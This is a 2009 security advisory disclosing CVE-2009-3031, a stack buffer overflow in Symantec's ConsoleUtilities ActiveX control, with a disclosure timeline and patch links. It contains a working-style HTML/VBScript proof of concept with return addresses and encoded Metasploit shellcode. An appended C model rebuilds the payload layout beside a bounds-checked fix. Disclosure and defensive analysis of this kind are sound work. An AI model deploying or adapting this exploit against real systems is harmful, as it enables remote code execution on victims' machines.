13.11.41 NSOADV-2009-001: Symantec ConsoleUtilities ActiveX Control Buffer Overflow
______________________________________________________________________

                   Security Advisory NSOADV-2009-001
______________________________________________________________________

Title:                   Symantec ConsoleUtilities ActiveX Control
                         Buffer Overflow
Severity:                Critical
Advisory ID:             NSOADV-2009-001
Found Date:              09.09.2009
Date Reported:           15.09.2009
Release Date:            02.11.2009
Author:                  Nikolas Sotiriu
Mail:                    nso-research at sotiriu.de
URL:                     http://sotiriu.de/adv/NSOADV-
Vendor:                  Symantec (http://www.symantec.com/)
Affected Products:       Symantec Altiris Notification Server 6.x
                         Symantec Management Platform 7.0.x
                         Symantec Altiris Deployment Solution 6.9.x
Affected Component:      ConsoleUtilities ActiveX Control V.6.0.0.1846
Not Affected Component:  ConsoleUtilities ActiveX Control V.6.0.0.2000
Remote Exploitable:      Yes
Local Exploitable:       No
CVE-ID:                  CVE-2009-3031
Patch Status:            Vendor released a patch
Discovered by:           Nikolas Sotiriu
Disclosure Policy:       http://sotiriu.de/policy.html
Thanks to:               Thierry Zoller: For the permission to use his Policy

Background:
===========

Altiris service-oriented management solutions provide a modular and
future-proof approach to managing highly diverse and widely distributed
IT infrastructures. They are open solutions that enable lifecycle
integration of client, handheld, server, network and other IT assets
with audit-ready security and automated operation.

(Product description from the Symantec website)

Description:
============

On first access to the management website, an ActiveX control
(AeXNSConsoleUtilities.dll) is installed in the browser. Its
"BrowseAndSaveFile" method is vulnerable to a stack-based buffer
overflow: the string passed as the second argument is copied into a
fixed-size stack buffer without a length check, so a web page that
instantiates the control can overwrite the saved return address and
execute arbitrary code. The proof of concept below does exactly that,
using a JMP ESP address from shell32.dll as the return address.

Name:     ConsoleUtilities Class
Vendor:   Altiris, Inc.
Type:     ActiveX control
Version:  6.0.0.1846
GUID:     {B44D252D-98FC-4D5C-948C-
File:     AeXNSConsoleUtilities.dll
Folder:   C:\WINDOWS\system32

Proof of Concept:
=================

<html>
<title>NSOADV-2009-001</title>
<object id='obj' classid='clsid:B44D252D-98FC-
</object>
<script language='vbscript'>
Sub Submit_OnClick
  ' Pick the return address selected in the form below.
  For i=0 to 2
    If document.ret.os(i).checked Then
      target=document.ret.os(i).value
    End If
  Next
  EIP=unescape(target)
  arg1 = ""
  arg3 = ""
  arg4 = ""
  arg5 = ""
  junk=String(310, "A")                   ' junk: fills the buffer up to the saved return address
  morejunk=String(18, unescape("%u0041")) ' more junk: padding between EIP and the shellcode
  ' windows/exec - 224 bytes
  ' http://www.metasploit.com
  ' Encoder: x86/call4_dword_xor
  ' EXITFUNC=seh, CMD=calc.exe
  code=unescape("%uc92b%ue983%
  "%u2dad%u8338%ufcee%uf4e2%
  "%u9c03%u5cff%uff6d%ub31d%
  "%u1ae9%u1e67%u52d7%uf81c%
  "%ua029%uff2c%u5d04%u6f7f%
  "%ued6d%ubd55%ud926%u3967%
  "%u7ee7%u04ce%u26af%ub319%
  "%ua029%uff2c%u4dde%ucc58%
  "%u26be%u1c75%u7ee7%ub34b%
  "%u26e2%ue82c%ue96f%u1c09%
  "%uf2be%ub377%u46f4%u65ab%
  "%uc5b6%ub31c%u2a89%uedd2%
  "%u305b%uedd2%uabda%u3251%
  "%uc294%u3847%u52b5%u5bf8%
  ' Overflowing string: junk + EIP + morejunk + ... + shellcode,
  ' passed as the second argument of the vulnerable method.
  buf=junk+EIP+morejunk+break+
  obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>
<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting!
The author accepts no liability for damage caused by this tool.<br>
Nikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/
<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>
XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br>
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br>
------------------------------
<form name="ret">
<input type=radio name="os" value="%u4141%u4141"> DoS<br>
<input type=radio name="os" value="%uaf0a%u77d5"> Windows XP SP2 German<br>
<input type=radio name="os" value="%u30D7%u7E68"> Windows XP SP3 German<br>
<input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/
</html>

Solution:
=========

Symantec Security Advisory:
http://tinyurl.com/y9fakve

Hotfix (KB49568): Deployment Solution 6.9 SP3
https://kb.altiris.com/

Hotfix (KB49389): Notification Server 6.x
                  Symantec Management Platform 7.x
https://kb.altiris.com/

Disclosure Timeline (YYYY.MM.DD):
=================================

2009.09.09: Vulnerability found
2009.09.15: Sent PoC, advisory, disclosure policy and planned
            disclosure date (2009.10.01) to the vendor
2009.09.15: Vendor asks for the PoC to be resent as a zipped,
            password-protected file (AV problem)
2009.09.15: Resent zipped and password-protected
2009.09.17: Symantec Security Response Team verifies the vulnerability
2009.09.22: Symantec product team verifies the finding
2009.09.29: Asked for a status update, because the planned release
            date is 2009.10.01
2009.09.29: Symantec Security Response Team tries to get a timeline
            from the product team
2009.09.30: Changed release date to 2009.10.08 until a timeline is
            known
2009.10.07: Asked for a status update, because the planned release
            date is 2009.10.08
2009.10.07: Symantec Security Response Team informs me that, if all
            goes well, they need one more week
2009.10.07: Changed release date to 2009.10.15
2009.10.14: Asked for a status update, because the planned release
            date is 2009.10.15
2009.10.14: Symantec Security Response Team informs me that they have
            an issue with an update and need one more week
2009.10.14: Changed release date to 2009.10.22
2009.10.21: Asked for a status update, because the planned release
            date is 2009.10.22
2009.10.21: Symantec Security Response Team informs me that they have
            an issue with an update
2009.10.21: Changed release date to 2009.10.29
2009.10.28: Asked for a status update, because the planned release
            date is 2009.10.29
2009.10.29: Symantec Security Response Team informs me that the patch
            will be released on 2009.11.02 at 9am PST
2009.11.02: Symantec Security Response Team informs me that the patch
            and the advisory are released
2009.11.02: Release of this advisory
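The C program below is an added illustration by the editor, not code from the advisory, from Symantec or from the PoC above. It models the bug class described in the Description section (an ActiveX method copying its string argument into a fixed stack buffer without a bound) next to a fail-closed version, and it reproduces the layout of the string the PoC builds: 310 junk characters, a return address given as two %u units, 18 more junk characters, then the shellcode. The names save_file_vulnerable, save_file_hardened and the buffer size PATH_UNITS are assumptions for illustration only; so is the premise that the control copies the BSTR as UTF-16 code units, which is inferred from the PoC encoding a 4-byte address as two %u units (under that premise the saved return address starts 620 bytes into the string). The two stand-in shellcode units are the first two of the PoC's encoded payload; the rest is deliberately not reproduced.

```c
/* Added example: model of the NSOADV-2009-001 bug class and of the PoC's
 * payload layout. Buffer size, function names and the UTF-16-copy premise
 * are assumptions for illustration, not facts from the advisory. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_UNITS 256u   /* assumed size of the control's stack buffer, in UTF-16 units */

/* Length of a NUL-terminated UTF-16 string in code units. */
static size_t u16len(const uint16_t *s) {
    size_t n = 0;
    while (s[n]) n++;
    return n;
}

/* Vulnerable model: unbounded wcscpy-style loop into a fixed stack buffer.
 * Only call with inputs shorter than PATH_UNITS; longer ones smash the stack. */
static size_t save_file_vulnerable(const uint16_t *initial_path) {
    uint16_t path[PATH_UNITS];
    size_t i = 0;
    do { path[i] = initial_path[i]; } while (initial_path[i++]);
    return u16len(path);
}

/* Hardened model: reject anything that does not fit, terminator included. */
static int save_file_hardened(const uint16_t *initial_path) {
    uint16_t path[PATH_UNITS];
    size_t n = u16len(initial_path);
    if (n >= PATH_UNITS) return -1;            /* fail closed instead of overflowing */
    memcpy(path, initial_path, (n + 1) * sizeof path[0]);
    return (int)n;
}

/* Decode a VBScript unescape("%uXXXX...") literal into UTF-16 units, the way the
 * PoC turns "%uaf0a%u77d5" into 0xaf0a, 0x77d5. Returns unit count, 0 on error. */
static size_t decode_unescape_u(const char *s, uint16_t *out, size_t cap) {
    size_t n = 0;
    while (*s) {
        if (n == cap) return 0;
        if (s[0] == '%' && s[1] == 'u') {
            char hex[5];
            for (int k = 0; k < 4; k++) {
                if (!isxdigit((unsigned char)s[2 + k])) return 0;
                hex[k] = s[2 + k];
            }
            hex[4] = '\0';
            out[n++] = (uint16_t)strtoul(hex, NULL, 16);
            s += 6;
        } else {
            out[n++] = (uint16_t)(unsigned char)*s++;   /* plain characters map 1:1 */
        }
    }
    return n;
}

/* Units are stored little-endian, so 0xaf0a followed by 0x77d5 lays down the
 * bytes 0a af d5 77: read back as a dword that is 0x77d5af0a, the JMP ESP the
 * PoC lists for shell32.dll on XP SP2 German. */
static uint32_t units_to_dword(const uint16_t *u) {
    return (uint32_t)u[0] | ((uint32_t)u[1] << 16);
}

#define JUNK_UNITS     310u   /* String(310, "A") */
#define RET_UNITS      2u     /* unescape("%uXXXX%uXXXX") */
#define MOREJUNK_UNITS 18u    /* String(18, unescape("%u0041")) */

/* Byte offset of the saved return address inside the overflowing string. */
static size_t ret_byte_offset(void) { return JUNK_UNITS * sizeof(uint16_t); }

/* Build junk + EIP + morejunk + shellcode as UTF-16 units. Returns total units, 0 on error. */
static size_t build_payload(const char *ret_literal, const uint16_t *shellcode, size_t sc_units,
                            uint16_t *out, size_t cap) {
    uint16_t ret[RET_UNITS];
    size_t total = JUNK_UNITS + RET_UNITS + MOREJUNK_UNITS + sc_units;
    if (total + 1 > cap) return 0;
    if (decode_unescape_u(ret_literal, ret, RET_UNITS) != RET_UNITS) return 0;
    for (size_t i = 0; i < JUNK_UNITS; i++) out[i] = 'A';
    memcpy(out + JUNK_UNITS, ret, sizeof ret);
    for (size_t i = 0; i < MOREJUNK_UNITS; i++) out[JUNK_UNITS + RET_UNITS + i] = 0x0041;
    memcpy(out + JUNK_UNITS + RET_UNITS + MOREJUNK_UNITS, shellcode, sc_units * sizeof(uint16_t));
    out[total] = 0;
    return total;
}

int main(void) {
    uint16_t ret[RET_UNITS];
    static uint16_t payload[600];
    const uint16_t sc[] = { 0xc92b, 0xe983 };   /* stand-in: first two units of the PoC shellcode */
    if (decode_unescape_u("%uaf0a%u77d5", ret, RET_UNITS) != RET_UNITS) return 1;
    printf("EIP dword 0x%08x at byte offset %zu\n", units_to_dword(ret), ret_byte_offset());
    size_t n = build_payload("%uaf0a%u77d5", sc, 2, payload, 600);
    printf("payload: %zu units (%zu bytes)\n", n, n * sizeof(uint16_t));
    printf("hardened copy of payload returns %d (rejected)\n", save_file_hardened(payload));
    return 0;
}
```

The hardened function shows the shape of the fix at the code level (check the length against the destination before copying, and fail the call rather than truncate silently); the vendor's actual remedy is the updated control, version 6.0.0.2000, listed above as not affected. The decoder is also a handy way to sanity-check %u-encoded return addresses from other PoCs before trying them: reversing the two units is a common mistake, and the dword printed here is what must actually be a JMP ESP in the target module.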